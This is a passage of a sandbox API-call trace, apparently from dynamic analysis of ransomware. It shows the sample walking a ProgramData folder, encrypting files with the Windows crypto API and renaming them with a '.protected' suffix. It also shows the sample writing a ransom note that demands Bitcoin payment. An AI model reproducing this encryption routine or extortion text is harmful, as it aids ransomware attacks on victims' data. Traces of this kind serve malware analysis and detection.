(lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Program Files") returned -1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0076.489] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="System Volume Information") returned -1 [0076.489] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned 83 [0076.489] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0076.489] lstrcmpW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0076.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*") returned 85 [0076.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.489] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.489] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.489] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.489] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\.") returned 85 [0076.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.489] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.490] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.490] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\..") returned 86 [0076.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.490] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0076.490] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0076.490] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned 92 [0076.490] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0076.490] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0076.491] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*") returned 94 [0076.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0076.492] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.492] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.492] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.492] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\.") returned 94 [0076.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.492] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.492] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.492] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.492] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\..") returned 95 [0076.492] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.492] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0076.493] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0076.493] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64") returned 118 [0076.493] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0076.493] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0076.493] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*") returned 120 [0076.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0076.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.493] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.493] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.493] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\.") returned 120 [0076.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.493] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.494] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.494] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\..") returned 121 [0076.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.494] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0076.494] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0076.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.494] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0076.494] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0076.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0076.576] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 127 [0076.576] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0076.576] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.584] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.584] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.584] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.584] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.600] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.600] CloseHandle (hObject=0xd8) returned 1 [0076.610] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 137 [0076.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0076.611] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") returned -1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0076.611] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0076.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.611] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0076.611] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0076.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0076.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0076.612] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0076.612] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.612] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0076.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.613] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0076.613] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 147 [0076.613] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0076.613] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.614] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.614] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0076.615] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.615] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0076.615] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0076.615] CloseHandle (hObject=0xd8) returned 1 [0076.666] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 157 [0076.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0076.667] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0076.667] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0076.667] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 136 [0076.667] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0076.677] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.677] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0076.678] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.678] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0076.678] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.678] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0076.678] CloseHandle (hObject=0xd4) returned 1 [0076.679] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0076.679] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0076.679] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0076.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.679] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0076.680] lstrlenA 